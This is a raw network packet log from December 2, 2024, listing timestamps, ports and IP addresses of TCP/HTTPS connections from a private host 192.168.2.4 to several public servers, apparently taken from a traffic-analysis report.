                                                          Dec 2, 2024 17:55:15.365355968 CET49747443192.168.2.4142.250.181.100
                                                          Dec 2, 2024 17:55:15.365366936 CET44349747142.250.181.100192.168.2.4
                                                          Dec 2, 2024 17:55:15.413846016 CET49747443192.168.2.4142.250.181.100
                                                          Dec 2, 2024 17:55:15.752154112 CET49751443192.168.2.452.217.199.10
                                                          Dec 2, 2024 17:55:15.752198935 CET4434975152.217.199.10192.168.2.4
                                                          Dec 2, 2024 17:55:15.752290964 CET49751443192.168.2.452.217.199.10
                                                          Dec 2, 2024 17:55:15.752521038 CET49751443192.168.2.452.217.199.10
                                                          Dec 2, 2024 17:55:15.752536058 CET4434975152.217.199.10192.168.2.4
                                                          Dec 2, 2024 17:55:16.560513020 CET4434975023.32.185.164192.168.2.4
                                                          Dec 2, 2024 17:55:16.560651064 CET49750443192.168.2.423.32.185.164
                                                          Dec 2, 2024 17:55:16.562046051 CET49750443192.168.2.423.32.185.164
                                                          Dec 2, 2024 17:55:16.562063932 CET4434975023.32.185.164192.168.2.4
                                                          Dec 2, 2024 17:55:16.562308073 CET4434975023.32.185.164192.168.2.4
                                                          Dec 2, 2024 17:55:16.565749884 CET49750443192.168.2.423.32.185.164
                                                          Dec 2, 2024 17:55:16.611321926 CET4434975023.32.185.164192.168.2.4
                                                          Dec 2, 2024 17:55:17.124080896 CET4434975023.32.185.164192.168.2.4
                                                          Dec 2, 2024 17:55:17.124149084 CET4434975023.32.185.164192.168.2.4
                                                          Dec 2, 2024 17:55:17.124298096 CET49750443192.168.2.423.32.185.164
                                                          Dec 2, 2024 17:55:17.124825954 CET49750443192.168.2.423.32.185.164
                                                          Dec 2, 2024 17:55:17.124840021 CET4434975023.32.185.164192.168.2.4
                                                          Dec 2, 2024 17:55:17.124856949 CET49750443192.168.2.423.32.185.164
                                                          Dec 2, 2024 17:55:17.124871969 CET4434975023.32.185.164192.168.2.4
                                                          Dec 2, 2024 17:55:17.248995066 CET4434975152.217.199.10192.168.2.4
                                                          Dec 2, 2024 17:55:17.250240088 CET49751443192.168.2.452.217.199.10
                                                          Dec 2, 2024 17:55:17.250269890 CET4434975152.217.199.10192.168.2.4
                                                          Dec 2, 2024 17:55:17.251264095 CET4434975152.217.199.10192.168.2.4
                                                          Dec 2, 2024 17:55:17.251332998 CET49751443192.168.2.452.217.199.10
                                                          Dec 2, 2024 17:55:17.251343012 CET4434975152.217.199.10192.168.2.4
                                                          Dec 2, 2024 17:55:17.251384974 CET49751443192.168.2.452.217.199.10
                                                          Dec 2, 2024 17:55:17.252315044 CET49751443192.168.2.452.217.199.10
                                                          Dec 2, 2024 17:55:17.252372980 CET4434975152.217.199.10192.168.2.4
                                                          Dec 2, 2024 17:55:17.252547979 CET49751443192.168.2.452.217.199.10
                                                          Dec 2, 2024 17:55:17.252553940 CET4434975152.217.199.10192.168.2.4
                                                          Dec 2, 2024 17:55:17.303765059 CET49751443192.168.2.452.217.199.10
                                                          Dec 2, 2024 17:55:17.754359961 CET4434975152.217.199.10192.168.2.4
                                                          Dec 2, 2024 17:55:17.754488945 CET4434975152.217.199.10192.168.2.4
                                                          Dec 2, 2024 17:55:17.754566908 CET49751443192.168.2.452.217.199.10
                                                          Dec 2, 2024 17:55:17.755476952 CET49751443192.168.2.452.217.199.10
                                                          Dec 2, 2024 17:55:17.755495071 CET4434975152.217.199.10192.168.2.4
                                                          Dec 2, 2024 17:55:18.994187117 CET49754443192.168.2.4103.160.107.138
                                                          Dec 2, 2024 17:55:18.994220018 CET44349754103.160.107.138192.168.2.4
                                                          Dec 2, 2024 17:55:18.994282007 CET49754443192.168.2.4103.160.107.138
                                                          Dec 2, 2024 17:55:18.994731903 CET49755443192.168.2.4103.160.107.138
                                                          Dec 2, 2024 17:55:18.994781017 CET44349755103.160.107.138192.168.2.4
                                                          Dec 2, 2024 17:55:18.994909048 CET49755443192.168.2.4103.160.107.138
                                                          Dec 2, 2024 17:55:18.995063066 CET49754443192.168.2.4103.160.107.138
                                                          Dec 2, 2024 17:55:18.995076895 CET44349754103.160.107.138192.168.2.4
                                                          Dec 2, 2024 17:55:18.995320082 CET49755443192.168.2.4103.160.107.138
                                                          Dec 2, 2024 17:55:18.995332003 CET44349755103.160.107.138192.168.2.4
                                                          Dec 2, 2024 17:55:19.487551928 CET49756443192.168.2.44.175.87.197
                                                          Dec 2, 2024 17:55:19.487600088 CET443497564.175.87.197192.168.2.4
                                                          Dec 2, 2024 17:55:19.487684011 CET49756443192.168.2.44.175.87.197
                                                          Dec 2, 2024 17:55:19.489078999 CET49756443192.168.2.44.175.87.197
                                                          Dec 2, 2024 17:55:19.489093065 CET443497564.175.87.197192.168.2.4
                                                          Dec 2, 2024 17:55:20.787532091 CET44349754103.160.107.138192.168.2.4
                                                          Dec 2, 2024 17:55:20.787776947 CET49754443192.168.2.4103.160.107.138
                                                          Dec 2, 2024 17:55:20.787806988 CET44349754103.160.107.138192.168.2.4
                                                          Dec 2, 2024 17:55:20.788839102 CET44349754103.160.107.138192.168.2.4
                                                          Dec 2, 2024 17:55:20.788897038 CET49754443192.168.2.4103.160.107.138
                                                          Dec 2, 2024 17:55:20.789843082 CET49754443192.168.2.4103.160.107.138
                                                          Dec 2, 2024 17:55:20.789905071 CET44349754103.160.107.138192.168.2.4
                                                          Dec 2, 2024 17:55:20.790146112 CET49754443192.168.2.4103.160.107.138
                                                          Dec 2, 2024 17:55:20.790153980 CET44349754103.160.107.138192.168.2.4
                                                          Dec 2, 2024 17:55:20.834274054 CET44349755103.160.107.138192.168.2.4
                                                          Dec 2, 2024 17:55:20.834501982 CET49755443192.168.2.4103.160.107.138
                                                          Dec 2, 2024 17:55:20.834513903 CET44349755103.160.107.138192.168.2.4
                                                          Dec 2, 2024 17:55:20.835581064 CET44349755103.160.107.138192.168.2.4
                                                          Dec 2, 2024 17:55:20.835652113 CET49755443192.168.2.4103.160.107.138
                                                          Dec 2, 2024 17:55:20.835998058 CET49755443192.168.2.4103.160.107.138
                                                          Dec 2, 2024 17:55:20.836056948 CET44349755103.160.107.138192.168.2.4
                                                          Dec 2, 2024 17:55:20.840374947 CET49754443192.168.2.4103.160.107.138
                                                          Dec 2, 2024 17:55:20.880898952 CET49755443192.168.2.4103.160.107.138
                                                          Dec 2, 2024 17:55:20.880912066 CET44349755103.160.107.138192.168.2.4
                                                          Dec 2, 2024 17:55:20.927180052 CET49755443192.168.2.4103.160.107.138
                                                          Dec 2, 2024 17:55:21.306060076 CET443497564.175.87.197192.168.2.4
                                                          Dec 2, 2024 17:55:21.306232929 CET49756443192.168.2.44.175.87.197
                                                          Dec 2, 2024 17:55:21.311018944 CET49756443192.168.2.44.175.87.197
                                                          Dec 2, 2024 17:55:21.311038971 CET443497564.175.87.197192.168.2.4
                                                          Dec 2, 2024 17:55:21.311285019 CET443497564.175.87.197192.168.2.4
                                                          Dec 2, 2024 17:55:21.351414919 CET49756443192.168.2.44.175.87.197
                                                          Dec 2, 2024 17:55:21.717664003 CET44349754103.160.107.138192.168.2.4
                                                          Dec 2, 2024 17:55:21.717806101 CET44349754103.160.107.138192.168.2.4
                                                          Dec 2, 2024 17:55:21.717876911 CET44349754103.160.107.138192.168.2.4
                                                          Dec 2, 2024 17:55:21.717905045 CET49754443192.168.2.4103.160.107.138
                                                          Dec 2, 2024 17:55:21.718192101 CET49754443192.168.2.4103.160.107.138
                                                          Dec 2, 2024 17:55:21.718889952 CET49754443192.168.2.4103.160.107.138
                                                          Dec 2, 2024 17:55:21.718909025 CET44349754103.160.107.138192.168.2.4
                                                          Dec 2, 2024 17:55:21.737162113 CET49755443192.168.2.4103.160.107.138
                                                          Dec 2, 2024 17:55:21.738042116 CET49758443192.168.2.4103.160.107.138
                                                          Dec 2, 2024 17:55:21.738048077 CET49759443192.168.2.4103.160.107.138
                                                          Dec 2, 2024 17:55:21.738070011 CET44349758103.160.107.138192.168.2.4
                                                          Dec 2, 2024 17:55:21.738092899 CET44349759103.160.107.138192.168.2.4
                                                          Dec 2, 2024 17:55:21.741312981 CET49758443192.168.2.4103.160.107.138
                                                          Dec 2, 2024 17:55:21.741314888 CET49759443192.168.2.4103.160.107.138
                                                          Dec 2, 2024 17:55:21.742913961 CET49759443192.168.2.4103.160.107.138
                                                          Dec 2, 2024 17:55:21.742913961 CET49758443192.168.2.4103.160.107.138
                                                          Dec 2, 2024 17:55:21.742927074 CET44349758103.160.107.138192.168.2.4
                                                          Dec 2, 2024 17:55:21.742929935 CET44349759103.160.107.138192.168.2.4
                                                          Dec 2, 2024 17:55:21.783333063 CET44349755103.160.107.138192.168.2.4
                                                          Dec 2, 2024 17:55:22.352370024 CET44349755103.160.107.138192.168.2.4
                                                          Dec 2, 2024 17:55:22.353089094 CET44349755103.160.107.138192.168.2.4
                                                          Dec 2, 2024 17:55:22.353157043 CET49755443192.168.2.4103.160.107.138
                                                          Dec 2, 2024 17:55:22.353162050 CET44349755103.160.107.138192.168.2.4
                                                          Dec 2, 2024 17:55:22.353210926 CET49755443192.168.2.4103.160.107.138
                                                          Dec 2, 2024 17:55:22.354624987 CET49755443192.168.2.4103.160.107.138
                                                          Dec 2, 2024 17:55:22.354641914 CET44349755103.160.107.138192.168.2.4
                                                          Dec 2, 2024 17:55:22.807657003 CET49756443192.168.2.44.175.87.197
                                                          Dec 2, 2024 17:55:22.855340004 CET443497564.175.87.197192.168.2.4
                                                          Dec 2, 2024 17:55:23.409204006 CET443497564.175.87.197192.168.2.4
                                                          Dec 2, 2024 17:55:23.409235954 CET443497564.175.87.197192.168.2.4
                                                          Dec 2, 2024 17:55:23.409246922 CET443497564.175.87.197192.168.2.4
                                                          Dec 2, 2024 17:55:23.409256935 CET443497564.175.87.197192.168.2.4
                                                          Dec 2, 2024 17:55:23.409280062 CET443497564.175.87.197192.168.2.4
                                                          Dec 2, 2024 17:55:23.409346104 CET49756443192.168.2.44.175.87.197
                                                          Dec 2, 2024 17:55:23.409369946 CET443497564.175.87.197192.168.2.4
                                                          Dec 2, 2024 17:55:23.409421921 CET49756443192.168.2.44.175.87.197
                                                          Dec 2, 2024 17:55:23.436839104 CET443497564.175.87.197192.168.2.4
                                                          Dec 2, 2024 17:55:23.436939001 CET443497564.175.87.197192.168.2.4
                                                          Dec 2, 2024 17:55:23.436939001 CET49756443192.168.2.44.175.87.197
                                                          Dec 2, 2024 17:55:23.437015057 CET49756443192.168.2.44.175.87.197
                                                          Dec 2, 2024 17:55:23.535276890 CET44349758103.160.107.138192.168.2.4
                                                          Dec 2, 2024 17:55:23.535531044 CET49758443192.168.2.4103.160.107.138
                                                          Dec 2, 2024 17:55:23.535557985 CET44349758103.160.107.138192.168.2.4
                                                          Dec 2, 2024 17:55:23.535911083 CET44349758103.160.107.138192.168.2.4
                                                          Dec 2, 2024 17:55:23.536186934 CET49758443192.168.2.4103.160.107.138
                                                          Dec 2, 2024 17:55:23.536250114 CET44349758103.160.107.138192.168.2.4
                                                          Dec 2, 2024 17:55:23.536315918 CET49758443192.168.2.4103.160.107.138
                                                          Dec 2, 2024 17:55:23.541702986 CET44349759103.160.107.138192.168.2.4
                                                          Dec 2, 2024 17:55:23.541913033 CET49759443192.168.2.4103.160.107.138
                                                          Dec 2, 2024 17:55:23.541930914 CET44349759103.160.107.138192.168.2.4
                                                          Dec 2, 2024 17:55:23.542284966 CET44349759103.160.107.138192.168.2.4
                                                          Dec 2, 2024 17:55:23.542543888 CET49759443192.168.2.4103.160.107.138
                                                          Dec 2, 2024 17:55:23.542602062 CET44349759103.160.107.138192.168.2.4
                                                          Dec 2, 2024 17:55:23.542639971 CET49759443192.168.2.4103.160.107.138
                                                          Dec 2, 2024 17:55:23.583323956 CET44349758103.160.107.138192.168.2.4
                                                          Dec 2, 2024 17:55:23.587340117 CET44349759103.160.107.138192.168.2.4
                                                          Dec 2, 2024 17:55:23.589862108 CET49759443192.168.2.4103.160.107.138
                                                          Dec 2, 2024 17:55:24.479948997 CET44349758103.160.107.138192.168.2.4
                                                          Dec 2, 2024 17:55:24.493591070 CET44349759103.160.107.138192.168.2.4
                                                          Dec 2, 2024 17:55:24.501857042 CET44349759103.160.107.138192.168.2.4
                                                          Dec 2, 2024 17:55:24.501866102 CET44349759103.160.107.138192.168.2.4
                                                          Dec 2, 2024 17:55:24.501897097 CET44349759103.160.107.138192.168.2.4
                                                          Dec 2, 2024 17:55:24.501915932 CET44349759103.160.107.138192.168.2.4
                                                          Dec 2, 2024 17:55:24.501935005 CET44349759103.160.107.138192.168.2.4
                                                          Dec 2, 2024 17:55:24.501939058 CET49759443192.168.2.4103.160.107.138
                                                          Dec 2, 2024 17:55:24.501985073 CET49759443192.168.2.4103.160.107.138
                                                          Dec 2, 2024 17:55:24.502238035 CET49759443192.168.2.4103.160.107.138
                                                          Dec 2, 2024 17:55:24.502252102 CET44349759103.160.107.138192.168.2.4
                                                          Dec 2, 2024 17:55:24.529491901 CET49758443192.168.2.4103.160.107.138
                                                          Dec 2, 2024 17:55:24.529515028 CET44349758103.160.107.138192.168.2.4
                                                          Dec 2, 2024 17:55:24.583839893 CET49758443192.168.2.4103.160.107.138
                                                          Dec 2, 2024 17:55:24.738737106 CET49762443192.168.2.4104.26.12.205
                                                          Dec 2, 2024 17:55:24.738775969 CET44349762104.26.12.205192.168.2.4
                                                          Dec 2, 2024 17:55:24.739089012 CET49762443192.168.2.4104.26.12.205
                                                          Dec 2, 2024 17:55:24.740593910 CET49764443192.168.2.4103.160.107.138
                                                          Dec 2, 2024 17:55:24.740600109 CET44349764103.160.107.138192.168.2.4
                                                          Dec 2, 2024 17:55:24.740654945 CET49764443192.168.2.4103.160.107.138
                                                          Dec 2, 2024 17:55:24.740823984 CET49762443192.168.2.4104.26.12.205
                                                          Dec 2, 2024 17:55:24.740838051 CET44349762104.26.12.205192.168.2.4
                                                          Dec 2, 2024 17:55:24.740973949 CET49764443192.168.2.4103.160.107.138
                                                          Dec 2, 2024 17:55:24.740986109 CET44349764103.160.107.138192.168.2.4
                                                          Dec 2, 2024 17:55:24.766865015 CET44349758103.160.107.138192.168.2.4
                                                          Dec 2, 2024 17:55:24.766879082 CET44349758103.160.107.138192.168.2.4
                                                          Dec 2, 2024 17:55:24.766917944 CET44349758103.160.107.138192.168.2.4
                                                          Dec 2, 2024 17:55:24.766935110 CET44349758103.160.107.138192.168.2.4
                                                          Dec 2, 2024 17:55:24.766946077 CET49758443192.168.2.4103.160.107.138
                                                          Dec 2, 2024 17:55:24.766956091 CET44349758103.160.107.138192.168.2.4
                                                          Dec 2, 2024 17:55:24.766973019 CET44349758103.160.107.138192.168.2.4
                                                          Dec 2, 2024 17:55:24.767009020 CET49758443192.168.2.4103.160.107.138
                                                          Dec 2, 2024 17:55:24.786572933 CET44349758103.160.107.138192.168.2.4
                                                          Dec 2, 2024 17:55:24.786607027 CET44349758103.160.107.138192.168.2.4
                                                          Dec 2, 2024 17:55:24.786643028 CET44349758103.160.107.138192.168.2.4
                                                          Dec 2, 2024 17:55:24.786675930 CET49758443192.168.2.4103.160.107.138
                                                          Dec 2, 2024 17:55:24.786698103 CET49758443192.168.2.4103.160.107.138
                                                          Dec 2, 2024 17:55:24.787090063 CET49758443192.168.2.4103.160.107.138
                                                          Dec 2, 2024 17:55:24.787101030 CET44349758103.160.107.138192.168.2.4
                                                          Dec 2, 2024 17:55:24.792368889 CET49765443192.168.2.4103.160.107.138
                                                          Dec 2, 2024 17:55:24.792383909 CET44349765103.160.107.138192.168.2.4
                                                          Dec 2, 2024 17:55:24.792452097 CET49765443192.168.2.4103.160.107.138
                                                          Dec 2, 2024 17:55:24.792639017 CET49765443192.168.2.4103.160.107.138
                                                          Dec 2, 2024 17:55:24.792649031 CET44349765103.160.107.138192.168.2.4
                                                          Dec 2, 2024 17:55:24.795334101 CET49766443192.168.2.4103.160.107.138
                                                          Dec 2, 2024 17:55:24.795342922 CET44349766103.160.107.138192.168.2.4
                                                          Dec 2, 2024 17:55:24.795414925 CET49766443192.168.2.4103.160.107.138
                                                          Dec 2, 2024 17:55:24.795578957 CET49766443192.168.2.4103.160.107.138
                                                          Dec 2, 2024 17:55:24.795588970 CET44349766103.160.107.138192.168.2.4
                                                          Dec 2, 2024 17:55:24.900454998 CET49756443192.168.2.44.175.87.197
                                                          Dec 2, 2024 17:55:24.900476933 CET443497564.175.87.197192.168.2.4
                                                          Dec 2, 2024 17:55:24.900491953 CET49756443192.168.2.44.175.87.197
                                                          Dec 2, 2024 17:55:24.900499105 CET443497564.175.87.197192.168.2.4
                                                          Dec 2, 2024 17:55:24.999768019 CET44349747142.250.181.100192.168.2.4
                                                          Dec 2, 2024 17:55:24.999835014 CET44349747142.250.181.100192.168.2.4
                                                          Dec 2, 2024 17:55:24.999929905 CET49747443192.168.2.4142.250.181.100
                                                          Dec 2, 2024 17:55:25.339047909 CET49747443192.168.2.4142.250.181.100
                                                          Dec 2, 2024 17:55:25.339071989 CET44349747142.250.181.100192.168.2.4
                                                          Dec 2, 2024 17:55:25.907103062 CET804972384.201.208.72192.168.2.4
                                                          Dec 2, 2024 17:55:25.907221079 CET4972380192.168.2.484.201.208.72
                                                          Dec 2, 2024 17:55:25.907329082 CET4972380192.168.2.484.201.208.72
                                                          Dec 2, 2024 17:55:26.004065990 CET44349762104.26.12.205192.168.2.4
                                                          Dec 2, 2024 17:55:26.004302979 CET49762443192.168.2.4104.26.12.205
                                                          Dec 2, 2024 17:55:26.004329920 CET44349762104.26.12.205192.168.2.4
                                                          Dec 2, 2024 17:55:26.005505085 CET44349762104.26.12.205192.168.2.4
                                                          Dec 2, 2024 17:55:26.005568981 CET49762443192.168.2.4104.26.12.205
                                                          Dec 2, 2024 17:55:26.006736994 CET49762443192.168.2.4104.26.12.205
                                                          Dec 2, 2024 17:55:26.006860971 CET44349762104.26.12.205192.168.2.4
                                                          Dec 2, 2024 17:55:26.007008076 CET49762443192.168.2.4104.26.12.205
                                                          Dec 2, 2024 17:55:26.007015944 CET44349762104.26.12.205192.168.2.4
                                                          Dec 2, 2024 17:55:26.027554035 CET804972384.201.208.72192.168.2.4
                                                          Dec 2, 2024 17:55:26.053942919 CET49762443192.168.2.4104.26.12.205
                                                          Dec 2, 2024 17:55:26.472047091 CET44349762104.26.12.205192.168.2.4
                                                          Dec 2, 2024 17:55:26.472122908 CET44349762104.26.12.205192.168.2.4
                                                          Dec 2, 2024 17:55:26.472239017 CET49762443192.168.2.4104.26.12.205
                                                          Dec 2, 2024 17:55:26.473439932 CET49762443192.168.2.4104.26.12.205
                                                          Dec 2, 2024 17:55:26.473458052 CET44349762104.26.12.205192.168.2.4
                                                          Dec 2, 2024 17:55:26.579473972 CET44349764103.160.107.138192.168.2.4
                                                          Dec 2, 2024 17:55:26.579731941 CET49764443192.168.2.4103.160.107.138
                                                          Dec 2, 2024 17:55:26.579741001 CET44349764103.160.107.138192.168.2.4
                                                          Dec 2, 2024 17:55:26.580774069 CET44349764103.160.107.138192.168.2.4
                                                          Dec 2, 2024 17:55:26.580832958 CET49764443192.168.2.4103.160.107.138
                                                          Dec 2, 2024 17:55:26.581186056 CET49764443192.168.2.4103.160.107.138
                                                          Dec 2, 2024 17:55:26.581244946 CET44349764103.160.107.138192.168.2.4
                                                          Dec 2, 2024 17:55:26.581430912 CET49764443192.168.2.4103.160.107.138
                                                          Dec 2, 2024 17:55:26.581438065 CET44349764103.160.107.138192.168.2.4
                                                          Dec 2, 2024 17:55:26.616939068 CET49769443192.168.2.4104.26.13.205
                                                          Dec 2, 2024 17:55:26.616966009 CET44349769104.26.13.205192.168.2.4
                                                          Dec 2, 2024 17:55:26.617026091 CET49769443192.168.2.4104.26.13.205
                                                          Dec 2, 2024 17:55:26.617252111 CET49769443192.168.2.4104.26.13.205
                                                          Dec 2, 2024 17:55:26.617264032 CET44349769104.26.13.205192.168.2.4
                                                          Dec 2, 2024 17:55:26.632072926 CET49764443192.168.2.4103.160.107.138
                                                          Dec 2, 2024 17:55:26.648977041 CET44349766103.160.107.138192.168.2.4
                                                          Dec 2, 2024 17:55:26.649166107 CET49766443192.168.2.4103.160.107.138
                                                          Dec 2, 2024 17:55:26.649174929 CET44349766103.160.107.138192.168.2.4
                                                          Dec 2, 2024 17:55:26.650374889 CET44349766103.160.107.138192.168.2.4
                                                          Dec 2, 2024 17:55:26.650435925 CET49766443192.168.2.4103.160.107.138
                                                          Dec 2, 2024 17:55:26.650854111 CET49766443192.168.2.4103.160.107.138
                                                          Dec 2, 2024 17:55:26.650854111 CET49766443192.168.2.4103.160.107.138
                                                          Dec 2, 2024 17:55:26.650917053 CET44349766103.160.107.138192.168.2.4
                                                          Dec 2, 2024 17:55:26.657840014 CET44349765103.160.107.138192.168.2.4
                                                          Dec 2, 2024 17:55:26.658000946 CET49765443192.168.2.4103.160.107.138
                                                          Dec 2, 2024 17:55:26.658016920 CET44349765103.160.107.138192.168.2.4
                                                          Dec 2, 2024 17:55:26.658366919 CET44349765103.160.107.138192.168.2.4
                                                          Dec 2, 2024 17:55:26.658725977 CET49765443192.168.2.4103.160.107.138
                                                          Dec 2, 2024 17:55:26.658787012 CET44349765103.160.107.138192.168.2.4
                                                          Dec 2, 2024 17:55:26.658864975 CET49765443192.168.2.4103.160.107.138
                                                          Dec 2, 2024 17:55:26.694638014 CET49766443192.168.2.4103.160.107.138
                                                          Dec 2, 2024 17:55:26.694643974 CET44349766103.160.107.138192.168.2.4
                                                          Dec 2, 2024 17:55:26.699333906 CET44349765103.160.107.138192.168.2.4
                                                          Dec 2, 2024 17:55:26.741455078 CET49766443192.168.2.4103.160.107.138
                                                          Dec 2, 2024 17:55:26.815098047 CET49770443192.168.2.4103.126.138.87
                                                          Dec 2, 2024 17:55:26.815165043 CET44349770103.126.138.87192.168.2.4
                                                          Dec 2, 2024 17:55:26.815233946 CET49770443192.168.2.4103.126.138.87
                                                          Dec 2, 2024 17:55:26.815515995 CET49770443192.168.2.4103.126.138.87
                                                          Dec 2, 2024 17:55:26.815529108 CET44349770103.126.138.87192.168.2.4
                                                          Dec 2, 2024 17:55:27.539908886 CET44349764103.160.107.138192.168.2.4
                                                          Dec 2, 2024 17:55:27.548348904 CET44349764103.160.107.138192.168.2.4
                                                          Dec 2, 2024 17:55:27.548358917 CET44349764103.160.107.138192.168.2.4
                                                          Dec 2, 2024 17:55:27.548394918 CET44349764103.160.107.138192.168.2.4
                                                          Dec 2, 2024 17:55:27.548540115 CET44349764103.160.107.138192.168.2.4
                                                          Dec 2, 2024 17:55:27.548538923 CET49764443192.168.2.4103.160.107.138
                                                          Dec 2, 2024 17:55:27.548592091 CET49764443192.168.2.4103.160.107.138
                                                          Dec 2, 2024 17:55:27.549171925 CET49764443192.168.2.4103.160.107.138
                                                          Dec 2, 2024 17:55:27.549177885 CET44349764103.160.107.138192.168.2.4
                                                          Dec 2, 2024 17:55:27.612714052 CET44349766103.160.107.138192.168.2.4
                                                          Dec 2, 2024 17:55:27.635271072 CET44349765103.160.107.138192.168.2.4
                                                          Dec 2, 2024 17:55:27.635432959 CET44349765103.160.107.138192.168.2.4
                                                          Dec 2, 2024 17:55:27.635478973 CET49765443192.168.2.4103.160.107.138
                                                          Dec 2, 2024 17:55:27.635807037 CET49765443192.168.2.4103.160.107.138
                                                          Dec 2, 2024 17:55:27.635819912 CET44349765103.160.107.138192.168.2.4
                                                          Dec 2, 2024 17:55:27.661483049 CET49766443192.168.2.4103.160.107.138
                                                          Dec 2, 2024 17:55:27.661494017 CET44349766103.160.107.138192.168.2.4
                                                          Dec 2, 2024 17:55:27.708358049 CET49766443192.168.2.4103.160.107.138
                                                          Dec 2, 2024 17:55:27.910248041 CET44349766103.160.107.138192.168.2.4
                                                          Dec 2, 2024 17:55:27.910262108 CET44349766103.160.107.138192.168.2.4
                                                          Dec 2, 2024 17:55:27.910295963 CET44349766103.160.107.138192.168.2.4
                                                          Dec 2, 2024 17:55:27.910303116 CET44349766103.160.107.138192.168.2.4
                                                          Dec 2, 2024 17:55:27.910316944 CET44349766103.160.107.138192.168.2.4
                                                          Dec 2, 2024 17:55:27.910372019 CET49766443192.168.2.4103.160.107.138
                                                          Dec 2, 2024 17:55:27.910398960 CET44349766103.160.107.138192.168.2.4
                                                          Dec 2, 2024 17:55:27.910425901 CET49766443192.168.2.4103.160.107.138
                                                          Dec 2, 2024 17:55:27.920520067 CET44349769104.26.13.205192.168.2.4
                                                          Dec 2, 2024 17:55:27.920787096 CET49769443192.168.2.4104.26.13.205
                                                          Dec 2, 2024 17:55:27.920809031 CET44349769104.26.13.205192.168.2.4
                                                          Dec 2, 2024 17:55:27.921916962 CET44349769104.26.13.205192.168.2.4
                                                          Dec 2, 2024 17:55:27.921997070 CET49769443192.168.2.4104.26.13.205
                                                          Dec 2, 2024 17:55:27.922350883 CET49769443192.168.2.4104.26.13.205
                                                          Dec 2, 2024 17:55:27.922421932 CET44349769104.26.13.205192.168.2.4
                                                          Dec 2, 2024 17:55:27.922632933 CET49769443192.168.2.4104.26.13.205
                                                          Dec 2, 2024 17:55:27.922646999 CET44349769104.26.13.205192.168.2.4
                                                          Dec 2, 2024 17:55:27.930826902 CET44349766103.160.107.138192.168.2.4
                                                          Dec 2, 2024 17:55:27.930838108 CET44349766103.160.107.138192.168.2.4
                                                          Dec 2, 2024 17:55:27.930895090 CET49766443192.168.2.4103.160.107.138
                                                          Dec 2, 2024 17:55:27.930907011 CET44349766103.160.107.138192.168.2.4
                                                          Dec 2, 2024 17:55:27.931088924 CET49766443192.168.2.4103.160.107.138
                                                          Dec 2, 2024 17:55:27.931266069 CET49766443192.168.2.4103.160.107.138
                                                          Dec 2, 2024 17:55:27.931282043 CET44349766103.160.107.138192.168.2.4
                                                          Dec 2, 2024 17:55:27.973944902 CET49769443192.168.2.4104.26.13.205
                                                          Dec 2, 2024 17:55:28.392074108 CET44349769104.26.13.205192.168.2.4
                                                          Dec 2, 2024 17:55:28.392160892 CET44349769104.26.13.205192.168.2.4
                                                          Dec 2, 2024 17:55:28.392221928 CET49769443192.168.2.4104.26.13.205
                                                          Dec 2, 2024 17:55:28.635166883 CET49769443192.168.2.4104.26.13.205
                                                          Dec 2, 2024 17:55:28.635200977 CET44349769104.26.13.205192.168.2.4
                                                          Dec 2, 2024 17:55:29.034167051 CET44349770103.126.138.87192.168.2.4
                                                          Dec 2, 2024 17:55:29.034413099 CET49770443192.168.2.4103.126.138.87
                                                          Dec 2, 2024 17:55:29.034431934 CET44349770103.126.138.87192.168.2.4
                                                          Dec 2, 2024 17:55:29.035442114 CET44349770103.126.138.87192.168.2.4
                                                          Dec 2, 2024 17:55:29.035499096 CET49770443192.168.2.4103.126.138.87
                                                          Dec 2, 2024 17:55:29.036592960 CET49770443192.168.2.4103.126.138.87
                                                          Dec 2, 2024 17:55:29.036685944 CET44349770103.126.138.87192.168.2.4
                                                          Dec 2, 2024 17:55:29.036736012 CET49770443192.168.2.4103.126.138.87
                                                          Dec 2, 2024 17:55:29.036741972 CET44349770103.126.138.87192.168.2.4
                                                          Dec 2, 2024 17:55:29.082954884 CET49770443192.168.2.4103.126.138.87
                                                          Dec 2, 2024 17:55:29.579844952 CET44349770103.126.138.87192.168.2.4
                                                          Dec 2, 2024 17:55:29.579940081 CET44349770103.126.138.87192.168.2.4
                                                          Dec 2, 2024 17:55:29.580018997 CET49770443192.168.2.4103.126.138.87
                                                          Dec 2, 2024 17:55:29.581767082 CET49770443192.168.2.4103.126.138.87
                                                          Dec 2, 2024 17:55:29.581787109 CET44349770103.126.138.87192.168.2.4
                                                          Dec 2, 2024 17:55:29.728507996 CET49771443192.168.2.4103.126.138.87
                                                          Dec 2, 2024 17:55:29.728547096 CET44349771103.126.138.87192.168.2.4
                                                          Dec 2, 2024 17:55:29.728621006 CET49771443192.168.2.4103.126.138.87
                                                          Dec 2, 2024 17:55:29.728835106 CET49771443192.168.2.4103.126.138.87
                                                          Dec 2, 2024 17:55:29.728847980 CET44349771103.126.138.87192.168.2.4
                                                          Dec 2, 2024 17:55:31.453572989 CET44349771103.126.138.87192.168.2.4
                                                          Dec 2, 2024 17:55:31.453916073 CET49771443192.168.2.4103.126.138.87
                                                          Dec 2, 2024 17:55:31.453942060 CET44349771103.126.138.87192.168.2.4
                                                          Dec 2, 2024 17:55:31.454962015 CET44349771103.126.138.87192.168.2.4
                                                          Dec 2, 2024 17:55:31.455027103 CET49771443192.168.2.4103.126.138.87
                                                          Dec 2, 2024 17:55:31.455410004 CET49771443192.168.2.4103.126.138.87
                                                          Dec 2, 2024 17:55:31.455480099 CET44349771103.126.138.87192.168.2.4
                                                          Dec 2, 2024 17:55:31.455565929 CET49771443192.168.2.4103.126.138.87
                                                          Dec 2, 2024 17:55:31.455574036 CET44349771103.126.138.87192.168.2.4
                                                          Dec 2, 2024 17:55:31.505048990 CET49771443192.168.2.4103.126.138.87
                                                          Dec 2, 2024 17:55:32.286757946 CET44349771103.126.138.87192.168.2.4
                                                          Dec 2, 2024 17:55:32.286844969 CET44349771103.126.138.87192.168.2.4
                                                          Dec 2, 2024 17:55:32.287007093 CET49771443192.168.2.4103.126.138.87
                                                          Dec 2, 2024 17:55:32.287739992 CET49771443192.168.2.4103.126.138.87
                                                          Dec 2, 2024 17:55:32.287771940 CET44349771103.126.138.87192.168.2.4
                                                          Dec 2, 2024 17:55:55.915205002 CET8049724178.79.238.0192.168.2.4
                                                          Dec 2, 2024 17:55:55.915446997 CET4972480192.168.2.4178.79.238.0
                                                          Dec 2, 2024 17:55:55.915446997 CET4972480192.168.2.4178.79.238.0
                                                          Dec 2, 2024 17:55:56.036108017 CET8049724178.79.238.0192.168.2.4
                                                          Dec 2, 2024 17:55:56.036158085 CET8049724178.79.238.0192.168.2.4
                                                          Dec 2, 2024 17:55:56.036365986 CET4972480192.168.2.4178.79.238.0
